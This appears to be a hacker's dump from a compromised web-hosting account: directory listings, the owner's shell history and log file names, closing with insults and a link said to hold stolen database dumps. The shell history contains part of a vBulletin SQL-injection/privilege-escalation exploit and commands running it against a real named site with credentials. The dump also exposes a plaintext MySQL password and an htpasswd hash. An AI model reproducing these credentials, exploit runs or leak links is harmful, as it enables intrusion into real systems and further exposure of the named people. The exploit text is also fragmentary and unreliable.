36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
[email protected] [/home/nopasara]# cat .bash_history
#1263692240
cd public_html/
#1263692243
test.php
#1263692248
php test.php
#1263692260
php test.php <?php
#1263692260
print_r('
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
');
#1263692260
if ($argc<7) {
#1263692260
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
host: target server (ip/hostname)
path: path to vbulletin
user/pass: you need a moderator account
forumid: existing forum
postid: existing post
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
');
#1263692260
die;
#1263692260
}
#1263692260
/*
#1263692260
vulnerable code in inlinemod.php near lines 185-209:
#1263692260
...
#1263692260
#1263692260
->GPC['postids']);
#1263692260
dex => $postid)
#1263692260
dex"] != intval($postid))
{
unset($postids["$index"]);
}
}
if (empty($postids))
{
#1263692279
php test.php
#1263692305
php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
#1263692308
php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
#1263692321
php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
#1263692381
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692470
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692489
Administrator
#1263692493
Administrator
#1263692496
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692539
cd ..
#1263692540
ls
#1263692547
rm .bash_history
#1263692551
cat .bash_h
#1263692557
exit
#1263831540
mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
#1263831932
mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
#1263833103
exit
#1263832465
ls -la
#1263832469
ls -la
#1263832491
vim .bash_history
#1263832552
mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
#1263832751
mysql --help|grep charset
#1263832754
mysql --help|grep char
#1263832908
cd public_html/
#1263832909
ls
#1263832912
cd sverdlov.net/
#1263832912
ls
#1263832923
vim wp-config.php
#1263837320
logou
#1263837322
logout
uname -a;w;id
cd /home/nopasara
ls -l
du -hs .
cd /home/nopasara
ls -lia
>> LOL, You're doing it wrong, idiot.
[email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
leech:204VnKl0pmERM
[email protected] [/home/nopasara]# ls -l docs
total 36044
drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
-rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
-rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
-rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
-rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
-rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
-rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
-rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
-rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
-rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
-rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
-rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
-rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
-rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
-rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
-rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
-rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
-rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
-rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
-rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
-rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
-rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
-rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
-rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
-rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
-rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
-rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
-rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
[email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
total 128288
drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
-rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
-rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
-rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
-rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
-rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
-rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
-rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
-rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
-rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
-rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
-rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
-rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
-rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
-rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
-rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
-rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
-rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
-rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
-rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
-rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
-rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
-rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
-rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
-rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
-rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
-rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
-rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
-rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
-rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
-rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
-rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
-rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
>> Check the URL for database dumps, etc.
Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
Here's the URL for the various dumps -
http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.